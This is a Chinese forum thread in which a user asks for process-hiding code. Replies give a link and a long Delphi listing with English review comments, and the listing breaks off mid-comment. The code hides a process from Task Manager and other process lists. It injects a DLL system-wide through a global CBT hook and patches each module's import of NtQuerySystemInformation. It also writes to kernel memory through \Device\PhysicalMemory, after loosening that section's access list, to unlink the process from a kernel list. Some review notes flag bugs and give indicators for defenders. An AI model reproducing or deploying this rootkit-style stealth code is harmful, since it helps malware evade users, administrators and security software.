谁有进程隐藏的代码？在网上找了半天，都不好用。
虽然没有真正隐藏，但也能糊弄一下，呵呵。
http://www.2ccc.com/article.asp?articleid=3763
这个或许对你有帮助，但是程序被杀毒软件报得很厉害。（下次多开点分嘛……）
可以上msn:[email protected]
Windows,
ImageHlp,
TlHelp32;

type
  { Information classes for the undocumented NtQuerySystemInformation,
    numbered by declaration order.  The hook in this DLL relies on exactly one
    value: SystemProcessesAndThreadsInformation (ordinal 5), the class that
    returns the SYSTEM_PROCESS_INFORMATION chain it filters.
    NOTE(review): the table is a point-in-time copy; later Windows versions
    extend and renumber the tail, but ordinal 5 is the only one used here. }
  SYSTEM_INFORMATION_CLASS = (
    SystemBasicInformation,
    SystemProcessorInformation,
    SystemPerformanceInformation,
    SystemTimeOfDayInformation,
    SystemNotImplemented1,
    SystemProcessesAndThreadsInformation,
    SystemCallCounts,
    SystemConfigurationInformation,
    SystemProcessorTimes,
    SystemGlobalFlag,
    SystemNotImplemented2,
    SystemModuleInformation,
    SystemLockInformation,
    SystemNotImplemented3,
    SystemNotImplemented4,
    SystemNotImplemented5,
    SystemHandleInformation,
    SystemObjectInformation,
    SystemPagefileInformation,
    SystemInstructionEmulationCounts,
    SystemInvalidInfoClass1,
    SystemCacheInformation,
    SystemPoolTagInformation,
    SystemProcessorStatistics,
    SystemDpcInformation,
    SystemNotImplemented6,
    SystemLoadImage,
    SystemUnloadImage,
    SystemTimeAdjustment,
    SystemNotImplemented7,
    SystemNotImplemented8,
    SystemNotImplemented9,
    SystemCrashDumpInformation,
    SystemExceptionInformation,
    SystemCrashDumpStateInformation,
    SystemKernelDebuggerInformation,
    SystemContextSwitchInformation,
    SystemRegistryQuotaInformation,
    SystemLoadAndCallImage,
    SystemPrioritySeparation,
    SystemNotImplemented10,
    SystemNotImplemented11,
    SystemInvalidInfoClass2,
    SystemInvalidInfoClass3,
    SystemTimeZoneInformation,
    SystemLookasideInformation,
    SystemSetTimeSlipEvent,
    SystemCreateSession,
    SystemDeleteSession,
    SystemInvalidInfoClass4,
    SystemRangeStartInformation,
    SystemVerifierInformation,
    SystemAddVerifier,
    SystemSessionProcessesInformation
  );

  { PE import descriptor (one per imported DLL).  ReplaceIATEntryInOneMod walks
    the array returned by ImageDirectoryEntryToData and uses Name (RVA of the
    DLL name) and FirstThunk (RVA of the import address table). }
  _IMAGE_IMPORT_DESCRIPTOR = packed record
    case integer of
      0:(Characteristics: DWORD);
      1:(OriginalFirstThunk:DWORD; TimeDateStamp:DWORD; ForwarderChain: DWORD; Name: DWORD; FirstThunk: DWORD);
  end;
  IMAGE_IMPORT_DESCRIPTOR=_IMAGE_IMPORT_DESCRIPTOR;
  PIMAGE_IMPORT_DESCRIPTOR=^IMAGE_IMPORT_DESCRIPTOR;
  PFARPROC=^FARPROC;

{ User-mode IAT patch.  In module hmodCaller, find the import descriptor whose
  DLL name equals pszCallerModName (case-insensitive), then scan that
  descriptor's FirstThunk array (the IAT) for the slot holding pfnCurrent and
  overwrite it with pfnNew.  InterceptFunctions calls it with
  (real NtQuerySystemInformation -> hook) and UninterceptFunctions with the
  arguments swapped.
  Silently returns when the module has no import directory, does not import
  pszCallerModName, or has no slot equal to pfnCurrent.  Only the first
  matching slot is written.
  NOTE(review): the slot's page is switched to PAGE_EXECUTE_READWRITE and never
  restored, and the VirtualProtectEx / WriteProcessMemory results are ignored,
  so a failed patch is indistinguishable from success.
  NOTE(review): for defenders - an IAT slot for ntdll that points outside
  ntdll's image range is exactly the artifact this leaves behind. }
procedure ReplaceIATEntryInOneMod(pszCallerModName: Pchar; pfnCurrent: FarProc; pfnNew: FARPROC; hmodCaller: hModule);
var
  ulSize: ULONG;
  pImportDesc: PIMAGE_IMPORT_DESCRIPTOR;
  pszModName: PChar;
  pThunk: PDWORD; ppfn:PFARPROC;
  ffound: LongBool;
  written: DWORD;   // reused as VirtualProtectEx's old-protection out-param
begin
  // Import directory of the target module (ImageHlp helper).
  pImportDesc:= ImageDirectoryEntryToData(Pointer(hmodCaller), TRUE,IMAGE_DIRECTORY_ENTRY_IMPORT, ulSize);
  if pImportDesc = nil then
    exit;
  // Descriptor names are RVAs relative to the module base.
  while pImportDesc.Name <> 0 do begin
    pszModName := PChar(hmodCaller + pImportDesc.Name);
    if (lstrcmpiA(pszModName, pszCallerModName) = 0) then
      break;
    Inc(pImportDesc);
  end;
  if (pImportDesc.Name = 0) then
    exit;
  // Walk the IAT of that DLL until the slot currently holding pfnCurrent is found.
  pThunk := PDWORD(hmodCaller + pImportDesc.FirstThunk);
  while pThunk^ <> 0 do begin
    ppfn := PFARPROC(pThunk);
    fFound := (ppfn^ = pfnCurrent);
    if (fFound) then begin
      VirtualProtectEx(GetCurrentProcess,ppfn,4,PAGE_EXECUTE_READWRITE,written);
      WriteProcessMemory(GetCurrentProcess, ppfn, @pfnNew, sizeof(pfnNew), Written);
      exit;
    end;
    Inc(pThunk);
  end;
end;

var
  addr_NtQuerySystemInformation: Pointer;   // real ntdll!NtQuerySystemInformation, resolved in InterceptFunctions
  mypid: DWORD;                             // PID to hide; stays 0 in the controlling process (see LibraryProc)
  fname: PCHAR;                             // host executable path, only used on the hideOnlyTaskMan path
  mapaddr: PDWORD;                          // view of 'NtHideFileMapping': dword at +0 = pid, BOOL at +4 = hideOnlyTaskMan
  hideOnlyTaskMan: PBOOL;

{ Replacement for NtQuerySystemInformation that every patched IAT slot points
  to.  Forwards to the original; when that succeeds and the class is
  SystemProcessesAndThreadsInformation it walks the returned
  SYSTEM_PROCESS_INFORMATION chain (NextEntryOffset at +0, UniqueProcessId at
  +44h) and unlinks the entry whose PID equals mypid: the hidden entry's
  NextEntryOffset is added to the previous entry's, or the previous entry's
  offset is set to 0 when the hidden one was last.  The walk restarts from the
  head after every unlink and stops when no entry matches.  Returns the
  original NTSTATUS in eax.
  NOTE(review): the first record is never compared - esi is advanced before
  the PID check - so a match in the head entry would not be hidden.
  NOTE(review): ebx and esi are clobbered and not restored; Delphi asm
  procedures and stdcall callers both expect them preserved, so a push/pop
  around the walk is missing.
  NOTE(review): this only hides the process from enumeration through patched
  modules; OpenProcess by PID, modules loaded after the patch, and any kernel
  or out-of-process view are unaffected. }
function myNtQuerySystemInfo(SystemInformationClass: SYSTEM_INFORMATION_CLASS; SystemInformation: Pointer;
  SystemInformationLength:ULONG; ReturnLength:PULONG):LongInt; stdcall;
label onceagain, getnextpidstruct, quit, fillzero;
asm
  // Forward to the real export with the caller's arguments.
  push ReturnLength
  push SystemInformationLength
  push SystemInformation
  push dword ptr SystemInformationClass
  call dword ptr [addr_NtQuerySystemInformation]
  or eax,eax
  jl quit                                   // negative NTSTATUS: pass the failure through
  cmp SystemInformationClass, SystemProcessesAndThreadsInformation
  jne quit                                  // only the process list is filtered
onceagain:
  mov esi, SystemInformation
getnextpidstruct:
  mov ebx, esi                              // ebx = previous entry
  cmp dword ptr [esi],0
  je quit                                   // NextEntryOffset 0: end of chain
  add esi, [esi]                            // esi = next entry
  mov ecx, [esi+44h]                        // UniqueProcessId
  cmp ecx, mypid
  jne getnextpidstruct
  mov edx, [esi]                            // hidden entry's NextEntryOffset
  test edx, edx
  je fillzero
  add [ebx], edx                            // previous skips over the hidden entry
  jmp onceagain
fillzero:
  and [ebx], edx                            // edx = 0: previous becomes the last entry
  jmp onceagain
quit:
  mov Result, eax
end;

procedure InterceptFunctions;
var
  hSnapShot: THandle;
  me32: MODULEENTRY32;
begin
  { Installs the hook in the current process: resolves the real
    NtQuerySystemInformation, snapshots every module currently loaded and
    redirects each module's ntdll import slot to MyNtQuerySystemInfo.
    Modules loaded after this call are not patched and keep seeing the
    unfiltered list.
    NOTE(review): the GetProcAddress result and the Module32First return value
    are not checked; a failed Module32First leaves me32.hModule = 0 for the
    first iteration. }
  addr_NtQuerySystemInformation:=GetProcAddress(getModuleHandle('ntdll.dll'),'NtQuerySystemInformation');
  hSnapShot:=CreateToolHelp32SnapShot(TH32CS_SNAPMODULE,GetCurrentProcessId);
  if hSnapshot=INVALID_HANDLE_VALUE then
    exit;
  try
    ZeroMemory(@me32,sizeof(MODULEENTRY32));
    me32.dwSize:=sizeof(MODULEENTRY32);
    Module32First(hSnapShot,me32);
    repeat
      ReplaceIATEntryInOneMod('ntdll.dll',addr_NtQuerySystemInformation,@MyNtQuerySystemInfo,me32.hModule);
    until not Module32Next(hSnapShot,me32);
  finally
    CloseHandle(hSnapShot);
  end;
end;

procedure UninterceptFunctions;
var
  hSnapShot: THandle;
  me32: MODULEENTRY32;
begin
  { Reverse of InterceptFunctions: the same module walk, with the patch
    arguments swapped so every slot that currently holds
    @MyNtQuerySystemInfo is restored to the real export.  Slots that hold
    anything else are left alone.  Called from LibraryProc on
    DLL_PROCESS_DETACH in injected processes.
    NOTE(review): as in InterceptFunctions, GetProcAddress and Module32First
    results are not checked. }
  addr_NtQuerySystemInformation:=GetProcAddress(getModuleHandle('ntdll.dll'),'NtQuerySystemInformation');
  hSnapShot:=CreateToolHelp32SnapShot(TH32CS_SNAPMODULE,GetCurrentProcessId);
  if hSnapshot=INVALID_HANDLE_VALUE then exit;
  try
    ZeroMemory(@me32,sizeof(MODULEENTRY32));
    me32.dwSize:=sizeof(MODULEENTRY32);
    Module32First(hSnapShot,me32);
    repeat
      ReplaceIATEntryInOneMod('ntdll.dll',@MyNtQuerySystemInfo,addr_NtQuerySystemInformation,me32.hModule);
    until not Module32Next(hSnapShot,me32);
  finally
    CloseHandle(hSnapShot);
  end;
end;
var HookHandle: THandle;   // handle returned by SetWindowsHookEx in InstallHook

{ Do-nothing CBT hook procedure.  It exists only so that SetWindowsHookEx has a
  callback: a system-wide WH_CBT hook makes Windows map this DLL into every
  GUI process, and the DLL's initialization section does the real work.
  Always returns 0 and does not call CallNextHookEx, so other CBT hooks in the
  chain are not run for the events it receives. }
function CbtProc(code: integer; wparam: integer; lparam: integer):Integer; stdcall;
begin
  Result:=0;
end;

{ Installs the global (dwThreadId = 0) WH_CBT hook that injects this DLL.
  NOTE(review): HookHandle is never passed to UnhookWindowsHookEx anywhere in
  this listing. }
procedure InstallHook; stdcall;
begin
  HookHandle := SetWindowsHookEx(WH_CBT, @CbtProc, HInstance, 0);
end;

var hFirstMapHandle:THandle;   // section created by HideProcess; closed by LibraryProc in the controller

{ Exported: publishes pid in the 'NtHideFileMapping' section and installs the injecting CBT hook. }
procedure HideProcess(pid:DWORD); stdcall;
{ Controller side of the hider.  Creates an 8-byte page-file-backed section
  named 'NtHideFileMapping' (hFile = $FFFFFFFF, i.e. INVALID_HANDLE_VALUE),
  stores the PID to hide at offset 0 and a hideOnlyTaskMan flag at offset 4,
  then installs the CBT hook so every injected copy of this DLL can read them
  during its initialization.
  NOTE(review): the flag is always written as false, so with this controller
  every GUI process in the session gets patched, not just Task Manager.
  NOTE(review): the section is created with a nil security descriptor and a
  fixed, discoverable name; for defenders a section object called
  NtHideFileMapping in the object namespace is a reliable indicator. }
var
  addrMap: PDWORD;
  ptr2: PBOOL;
begin
  mypid:=0;   // marks this instance as the controller (LibraryProc keys off it)
  hFirstMapHandle:=CreateFileMapping($FFFFFFFF,nil,PAGE_READWRITE,0,8,'NtHideFileMapping');
  if hFirstMapHandle=0 then
    exit;
  addrMap:=MapViewOfFile(hFirstMapHandle,FILE_MAP_WRITE,0,0,8);
  if addrMap=nil then begin
    CloseHandle(hFirstMapHandle);
    exit;
  end;
  addrMap^:=pid;                          // +0: PID to hide
  ptr2:=PBOOL(DWORD(addrMap)+4);
  ptr2^:= false;                          // +4: hideOnlyTaskMan
  UnmapViewOfFile(addrMap);
  InstallHook;
end;

exports
  HideProcess;

var
  hmap: THandle;   // handle from OpenFileMapping in the initialization section

{ DLL entry callback, assigned to DLLProc at the end of initialization.
  On DLL_PROCESS_DETACH an injected instance (mypid > 0) removes its IAT
  patches, while the controlling instance (mypid = 0) closes the shared
  section it created in HideProcess.
  NOTE(review): DLLProc is only assigned when the section could be opened, so
  a copy loaded without the section never receives this callback (it also has
  nothing to undo). }
procedure LibraryProc(Reason: Integer);
begin
  if Reason = DLL_PROCESS_DETACH then
    if mypid > 0 then
      UninterceptFunctions()
    else
      CloseHandle(hFirstMapHandle);
end;

{ Part of APath after its last backslash ('' for an empty path); no '/' or ':' handling. }
function ExtractFileName(APath:string): string;
var
  Cut: Integer;
begin
  { Returns everything after the last backslash in APath.  Unlike the SysUtils
    version, only '\' is treated as a separator.  An empty path yields ''. }
  Result := '';
  if APath = '' then
    Exit;
  Cut := Length(APath);
  while (Cut > 0) and (APath[Cut] <> '\') do
    Dec(Cut);
  // Cut is now the index of the last backslash, or 0 if there is none.
  Result := Copy(APath, Cut + 1, MaxInt);
end;

function AllocMem(Size: Cardinal): Pointer;
begin
  { Zero-filled block of Size bytes from the heap; release with FreeMem. }
  Result := nil;
  GetMem(Result, Size);
  ZeroMemory(Result, Size);
end;

begin
{ Library initialization - runs in every process this DLL is mapped into,
  including those the WH_CBT hook injects it into.
  Reads the PID (+0) and the hideOnlyTaskMan flag (+4) from the
  'NtHideFileMapping' section published by HideProcess, optionally restricts
  itself to a host whose executable name is exactly 'taskmgr.exe', and then
  patches every loaded module's NtQuerySystemInformation import.  When the
  section does not exist nothing is hooked and DLLProc stays unset.
  NOTE(review): fname is never freed (one leak per injected process) and the
  name comparison is case-sensitive although Windows file names are not - in
  the listing as posted this branch is dead anyway, because HideProcess always
  stores hideOnlyTaskMan = false.
  NOTE(review): UnmapViewOfFile(mapaddr) in the finally block also runs on the
  mapaddr = nil exit path; it then merely returns an error. }
hmap:=OpenFileMapping(FILE_MAP_READ,false,'NtHideFileMapping');
if hmap=0 then
  exit;
try
  mapaddr:=MapViewOfFile(hmap,FILE_MAP_READ,0,0,0);
  if mapaddr=nil then
    exit;
  mypid:=mapaddr^;
  hideOnlyTaskMan:=PBOOL(DWORD(mapaddr)+4);
  if hideOnlyTaskMan^ then begin
    fname:=allocMem(MAX_PATH+1);
    GetModuleFileName(GetModuleHandle(nil),fname,MAX_PATH+1);
    if not (ExtractFileName(fname)='taskmgr.exe') then
      exit;
  end;
  InterceptFunctions;
finally
  UnmapViewOfFile(mapaddr);
  CloseHandle(Hmap);
  DLLProc:=@LibraryProc;   // from here on LibraryProc sees DLL_PROCESS_DETACH
end;
end.

program load;
uses windows;
var
  VHideProcess:procedure(pid:DWORD); stdcall;   // 'HideProcess' export of lhide.dll, bound at run time

{ Loads lhide.dll and calls its exported HideProcess with pid.  The library is
  intentionally never freed: the hook and the shared section live inside it.
  NOTE(review): neither the LoadLibrary handle nor the GetProcAddress result
  is checked; if lhide.dll is missing or lacks the export, VHideProcess is nil
  and the call faults. }
procedure HideProcess(pid:DWORD); stdcall;
var
  hget:THandle;
begin
  hget := LoadLibrary('lhide.dll');
  @VHideProcess := GetProcAddress(hget, 'HideProcess');
  VHideProcess(pid);
end;
begin
  { Demo: hide this very process, then idle so the hook (and the hiding) stays in effect. }
  HideProcess(GetCurrentProcessId);
  while True do Sleep(1);
end.
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls,
Forms, Dialogs, Registry, ComCtrls, StrUtils, StdCtrls,
ToolWin, Menus, ImgList, ActnList, IniFiles, CheckLst, FileCtrl, Aclapi,
Accctrl;
type
  { Hand-rolled NT native type aliases used by the declarations below. }
  NTSTATUS=Longint;
  USHORT =Byte;        // NOTE(review): the real USHORT is 16-bit (Word); see the UNICODE_STRING note below
  PWSTR=PWidechar;
  ULONG= Cardinal;
  HANDLE=Pointer;
  PVOID=Pointer;
  PCWSTR=PWidechar;
  PULONG=^ULONG ;
  HMODULE=THANDLE;

const
  { NTSTATUS returned by ZwOpenSection when the section's DACL refuses the request.
    NOTE(review): NTSTATUS is Longint (negative for this value) while the
    literal is a positive Cardinal; confirm the 'status = STATUS_ACCESS_DENIED'
    comparison in OpenPhysicalMemory is not silently widened to Int64 and made
    always false - declaring NTSTATUS as LongWord would remove the doubt. }
  STATUS_ACCESS_DENIED = $C0000022 ;
  { Flags for the Windows 9x-only kernel32 export RegisterServiceProcess. }
  RSP_SIMPLE_SERVICE = $00000001;
  RSP_UNREGISTER_SERVICE = $00000000 ;
type
  { Native UNICODE_STRING.  NOTE(review): with USHORT = Byte the first two
    fields are one byte each instead of two.  Default (non-packed) alignment
    still places Buffer at offset 4, so RtlInitUnicodeString's 16-bit writes
    do not overflow the record, but Length/MaximumLength cannot be read back
    correctly from the Delphi side. }
  _UNICODE_STRING= record
    Length:USHORT ;
    MaximumLength: USHORT;
    Buffer:PWSTR;
  end;
  UNICODE_STRING= _UNICODE_STRING;
  PUNICODE_STRING =^ _UNICODE_STRING ;

  { Native OBJECT_ATTRIBUTES, filled field by field in OpenPhysicalMemory. }
  _OBJECT_ATTRIBUTES =record
    Length:ULONG ;
    RootDirectory:HANDLE;
    ObjectName:PUNICODE_STRING;
    Attributes:ULONG;
    SecurityDescriptor:PVOID;
    SecurityQualityOfService:PVOID ;
  end;
  OBJECT_ATTRIBUTES=_OBJECT_ATTRIBUTES ;
  POBJECT_ATTRIBUTES=^_OBJECT_ATTRIBUTES;

  { ntdll exports resolved at run time by InitNTDLL. }
  ZWOPENSECTION=function(
    SectionHandle:PInteger;
    DesiredAccess:ACCESS_MASK;
    ObjectAttributes :POBJECT_ATTRIBUTES
  ): NTSTATUS; stdcall;
  RTLINITUNICODESTRING=procedure(
    DestinationString:PUNICODE_STRING;
    SourceString :PCWSTR
  );stdcall;

  { Process hider.  Usage: Create(98) or Create(2000), then DoHideMe.
    - Windows 9x path: RegisterServiceProcess on the current PID.
    - Windows 2000 path: opens \Device\PhysicalMemory from user mode (widening
      its DACL first when access is denied), translates kernel virtual
      addresses with a hand-written x86 page-table walk, and rewrites two
      pointers in a kernel list so the current process is unlinked from it
      (direct kernel object manipulation).  Every address and offset used on
      that path is a hard-coded 32-bit, non-PAE Windows 2000 value; on any
      other build the SetData writes land on arbitrary kernel memory.
    NOTE(review): later Windows versions refuse user-mode opens of
    \Device\PhysicalMemory altogether, so this path is historical. }
  TMyHideProcess=class
  private
    OSversion:Longint;            // 98 or 2000, as passed to Create
    RtlInitUnicodeString:RTLINITUNICODESTRING ;
    ZwOpenSection:ZWOPENSECTION;
    g_hNtDLL: HMODULE;            // LoadLibrary('ntdll.dll') handle
    g_pMapPhysicalMemory:PVOID;   // 4 KiB view at physical $30000, indexed by LinearToPhys as the page directory
    g_hMPM :THANDLE ;             // section handle for \Device\PhysicalMemory
    function InitNTDLL():bool;
    procedure CloseNTDLL();
    procedure SetPhyscialMemorySectionCanBeWrited( hSection:THANDLE) ;
    function OpenPhysicalMemory():THANDLE ;
    function LinearToPhys(BaseAddress:PULONG ; addr:PVOID):PVOID;
    function GetData(addr:PVOID ):ULONG;
    function SetData( addr:PVOID; data:ULONG):bool;
    function HideProcess2000():bool;
    procedure HideProcess98();
  public
    constructor Create( theosver:Longint);
    destructor Destroy();   // NOTE(review): not 'override' - Free / inherited destruction never reaches it
    procedure DoHideMe();
  end;

implementation

{ Stores the OS selector only; ntdll is not touched until HideProcess2000 runs InitNTDLL. }
constructor TMyHideProcess.Create( theosver:Longint);
begin
  // Does not call inherited Create; fields are zero-initialized by TObject's allocator.
  OSversion:=theosver;
end;
{ Releases the ntdll reference.
  NOTE(review): declared without 'override', so this hides TObject.Destroy
  instead of replacing it; Free and 'inherited' destruction call the virtual
  TObject.Destroy and never run this body.  It also does not call inherited. }
destructor TMyHideProcess.Destroy();
begin
  CloseNTDLL();
end;
{ Dispatches on OSversion.  Only 98 and 2000 are handled; any other value
  silently does nothing, and the HideProcess2000 result is discarded. }
procedure TMyHideProcess.DoHideMe();
begin
  case (OSversion) of
    98:
      HideProcess98();
    2000:
      HideProcess2000();
  end;
end;

{ Loads ntdll.dll and resolves RtlInitUnicodeString / ZwOpenSection (see body). }
function TMyHideProcess.InitNTDLL():bool;
var
  a:Longint;   // unused
begin
  { Loads ntdll.dll (taking a reference that CloseNTDLL drops) and resolves
    the two native APIs the Windows 2000 path needs.  Returns FALSE only when
    LoadLibrary fails.
    NOTE(review): the GetProcAddress results are not checked, so a missing
    export leaves a nil method pointer while the function still reports TRUE. }
  g_hNtDLL := 0;
  g_pMapPhysicalMemory := nil;
  g_hMPM := 0;
  g_hNtDLL := LoadLibrary( 'ntdll.dll' );
  if (g_hNtDLL=0 ) then
  begin
    result:= FALSE;
    exit;
  end;
  @RtlInitUnicodeString := GetProcAddress( g_hNtDLL, 'RtlInitUnicodeString');
  @ZwOpenSection := GetProcAddress( g_hNtDLL, 'ZwOpenSection');
  result:= TRUE;
end;
{ Drops the ntdll.dll reference taken by InitNTDLL.
  NOTE(review): g_hNtDLL is not reset to 0 afterwards, and both
  HideProcess2000 and Destroy call this, so one LoadLibrary can be paired
  with two FreeLibrary calls. }
procedure TMyHideProcess.CloseNTDLL();
begin
  if(g_hNtDLL <>0 ) then
  begin
    FreeLibrary(g_hNtDLL);
  end;
end;
{ Appends an allow-ACE granting SECTION_MAP_WRITE to the well-known trustee
  name 'CURRENT_USER' on hSection's DACL.  hSection must have been opened with
  READ_CONTROL or WRITE_DAC (OpenPhysicalMemory does that on the retry path).
  Errors from any of the three ACL calls just jump to the cleanup; nothing is
  reported to the caller.
  NOTE(review): the DACL change on \Device\PhysicalMemory is never reverted
  by this unit - it outlives the hider.
  NOTE(review): pSD is declared as PPSECURITY_DESCRIPTOR and passed by value
  to GetSecurityInfo; whether that matches the AclApi binding in use is not
  visible here - possibly one of the lines reported as not compiling. }
procedure TMyHideProcess.SetPhyscialMemorySectionCanBeWrited( hSection:THANDLE) ;
label CleanUp;
var
  pDacl,pNewDacl: PACL ;
  pSD: PPSECURITY_DESCRIPTOR ;
  dwRes : DWORD;
  ea:EXPLICIT_ACCESS;
begin
  pDacl:=nil;
  pNewDacl :=nil;
  pSD:=nil;
  // Current DACL (pDacl points into pSD, which must be LocalFree'd).
  dwRes:=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,
    nil,nil,pDacl,nil,pSD);
  if(dwRes<>ERROR_SUCCESS) then
  begin
    goto CleanUp;
  end;
  // One explicit grant of SECTION_MAP_WRITE for the calling user.
  ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
  ea.grfAccessPermissions := SECTION_MAP_WRITE;
  ea.grfAccessMode := GRANT_ACCESS;
  ea.grfInheritance:= NO_INHERITANCE;
  ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
  ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
  ea.Trustee.ptstrName := 'CURRENT_USER';
  dwRes:=SetEntriesInAcl(1,@ea,pDacl,pNewDacl) ;
  if(dwRes<> ERROR_SUCCESS) then
  begin
    goto CleanUp;
  end;
  dwRes:=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, nil,nil,pNewDacl,nil);
  if(dwRes<>ERROR_SUCCESS) then
  begin
    goto CleanUp;
  end;
CleanUp:
  if(pSD<>nil) then
    LocalFree(Ulong(pSD));
  if(pNewDacl<>nil) then
    LocalFree(Ulong(pNewDacl));
end;

{ Opens \Device\PhysicalMemory and maps the assumed page directory (see body). }
function TMyHideProcess.OpenPhysicalMemory():THANDLE ;
var
  status: NTSTATUS ;
  physmemString:UNICODE_STRING;
  attributes:OBJECT_ATTRIBUTES;
begin
  { Opens the \Device\PhysicalMemory section for read/write and maps one page
    at physical $30000 into g_pMapPhysicalMemory, which LinearToPhys then
    indexes as the page directory.  On STATUS_ACCESS_DENIED the section is
    reopened with READ_CONTROL|WRITE_DAC, SetPhyscialMemorySectionCanBeWrited
    adds a write grant, the handle is closed and the open is retried.
    Returns the section handle, or 0 on failure.
    NOTE(review): Pascal string literals do not process backslash escapes, so
    '\\Device\\PhysicalMemory' really contains two backslashes per separator;
    the object name handed to the kernel is wrong (the C original this was
    ported from wrote "\\" for one backslash).
    NOTE(review): the success test is inverted - STATUS_SUCCESS is 0, so
    'if status=0 then result:=0' gives up exactly when the open worked and
    continues into MapViewOfFile with an unopened handle when it failed.  The
    statuses of the retry sequence are never checked either.
    NOTE(review): $30000 as the page-directory physical address is, like the
    other constants in this unit, a Windows 2000 x86 assumption. }
  RtlInitUnicodeString(@physmemString, PCWSTR('\\Device\\PhysicalMemory'));
  attributes.Length := sizeof(OBJECT_ATTRIBUTES);
  attributes.RootDirectory := nil;
  attributes.ObjectName := @physmemString;
  attributes.Attributes := 0;
  attributes.SecurityDescriptor := nil;
  attributes.SecurityQualityOfService := nil;
  status := ZwOpenSection(@g_hMPM,SECTION_MAP_READ or SECTION_MAP_WRITE,@attributes);
  if(status = STATUS_ACCESS_DENIED) then
  begin
    status := ZwOpenSection(@g_hMPM,READ_CONTROL or WRITE_DAC,@attributes);
    SetPhyscialMemorySectionCanBeWrited(g_hMPM);
    CloseHandle(g_hMPM);
    status :=ZwOpenSection(@g_hMPM,SECTION_MAP_READ or SECTION_MAP_WRITE,@attributes);
  end;
  if status=0 then
  begin
    result:= 0;
    exit;
  end;
  g_pMapPhysicalMemory := MapViewOfFile(
    g_hMPM,
    4,         // FILE_MAP_READ
    0,
    $30000,    // offset low = physical address of the assumed page directory
    $1000);
  if( g_pMapPhysicalMemory = nil ) then
  begin
    result:=0;
    exit ;
  end;
  result:= g_hMPM;
end;
//------------------------- indexing a ULONG array through a pointer -------------------------
type
  TArrayULONG = array [0..0] of ULONG;   // cast a PULONG to PTArrayULONG and index past [0]; no bounds checking intended
  PTArrayULONG= ^TArrayULONG;
//----------------------------------------------------------
{ Manual two-level x86 page walk (32-bit, non-PAE, 4 KiB pages).  BaseAddress
  is the mapped page directory, addr the virtual address to translate.
  Returns the physical address, or 0 when the PDE or PTE is not present.
  A PDE with the page-size bit ($80) set is resolved as a 4 MB page; otherwise
  the page table is mapped from \Device\PhysicalMemory (g_hMPM) for the one
  PTE lookup.
  NOTE(review): the MapViewOfFile result is used without a nil check, and on
  the 'PTE not present' path the mapped page table is never unmapped.
  NOTE(review): 0 doubles as the failure value, so callers cannot tell it from
  a real physical address 0. }
function TMyHideProcess.LinearToPhys(BaseAddress:PULONG ; addr:PVOID):PVOID;
var
  VAddr,PGDE,PTE,PAddr,tmp:ULONG;
  _PGDE:PULONG;
begin
  VAddr:=ULONG(addr);
  PGDE:=PTArrayULONG(BaseAddress)^[VAddr shr 22];      // PDE index = top 10 bits
  if ((PGDE and 1)<>0) then                            // present bit
  begin
    tmp:=PGDE and $00000080;                           // PS bit: 4 MB page
    if (tmp<>0) then
    begin
      PAddr:=(PGDE and $FFC00000)+(VAddr and $003FFFFF);
    end
    else
    begin
      // Map the page table this PDE points at and pick the PTE.
      PGDE:=ULONG(MapViewOfFile(g_hMPM, 4, 0, PGDE and $fffff000, $1000));
      _PGDE:=PULONG(PGDE);
      PTE:=PTArrayULONG(_PGDE)^[(VAddr and $003FF000) shr 12];   // PTE index = middle 10 bits
      if ((PTE and 1)<>0) then
      begin
        PAddr:=(PTE and $FFFFF000)+(VAddr and $00000FFF);
        UnmapViewOfFile(PVOID(PGDE));
      end
      else
      begin
        result:= 0;
        exit;
      end;
    end;
  end
  else
  begin
    result:= 0;
    exit;
  end;
  result:=PVOID(PAddr);
end;
{ Reads one ULONG at kernel virtual address addr through
  \Device\PhysicalMemory: LinearToPhys, map the containing physical page
  read-only (4 = FILE_MAP_READ), pick the dword, unmap.
  NOTE(review): the nil test is inverted.  As written a successful map returns
  0 and a failed map (tmp = nil) falls through and dereferences nil, so the
  function can never return real data; the guard has to be 'if (tmp=nil)'.
  NOTE(review): a LinearToPhys failure (0) is not distinguished from physical
  address 0, so the read silently continues on page 0. }
function
TMyHideProcess.GetData(addr:PVOID ):ULONG;
var
  phys,ret: ULONG;
  tmp: PULONG ;
begin
  phys:=ULONG(LinearToPhys(PULONG(g_pMapPhysicalMemory),PVOID(addr)));
  tmp:=PULONG(MapViewOfFile(g_hMPM, 4, 0, phys and $fffff000, $1000));
  if (tmp<>nil) then
  begin
    result:=0;
    exit;
  end;
  ret:=PTArrayULONG(tmp)^[(phys and $FFF) shr 2];   // dword index within the page
  UnmapViewOfFile(tmp);
  result:=ret;
end;
{ Writes one ULONG to kernel virtual address addr through
  \Device\PhysicalMemory (same translate/map/unmap sequence as GetData, with
  FILE_MAP_WRITE).  Returns TRUE after the write.
  NOTE(review): same inverted nil test as GetData - a successful map returns
  FALSE without writing, a failed map dereferences nil. }
function TMyHideProcess.SetData( addr:PVOID; data:ULONG):bool;
var
  phys,ret: ULONG;
  tmp: PULONG ;
begin
  phys:=ULONG(LinearToPhys(PULONG(g_pMapPhysicalMemory),PVOID(addr)));
  tmp:=PULONG(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $fffff000, $1000));
  if (tmp<>nil) then
  begin
    result:= FALSE;
    exit;
  end;
  PTArrayULONG(tmp)^[(phys and $FFF) shr 2]:=data;
  UnmapViewOfFile(tmp);
  result:= TRUE;
end;

{ Windows 2000 path: unlink the current process from the kernel list (see body). }
function TMyHideProcess.HideProcess2000():bool;
var
  thread, process ,fw ,bw :ULONG;
begin
  { Reads, through the physical-memory primitives above, a pointer at
    $FFDFF124, a second pointer at +$22c from it, and a pair of pointers at
    +$a0/+$a4 from that one (a Flink/Blink pair), then writes
    next->Blink := bw and prev->Flink := fw.  That removes this process's
    node from a kernel doubly linked list while leaving the node's own links
    untouched.  The constants presumably select KPCR.CurrentThread,
    ETHREAD.ThreadsProcess and EPROCESS.ActiveProcessLinks on Windows 2000 x86
    - confirm against symbols; on any other build these writes patch
    arbitrary kernel memory.
    Returns TRUE unless OpenPhysicalMemory fails - including when InitNTDLL
    fails, in which case nothing was done at all.
    NOTE(review): none of the GetData results are validated (a 0 from a failed
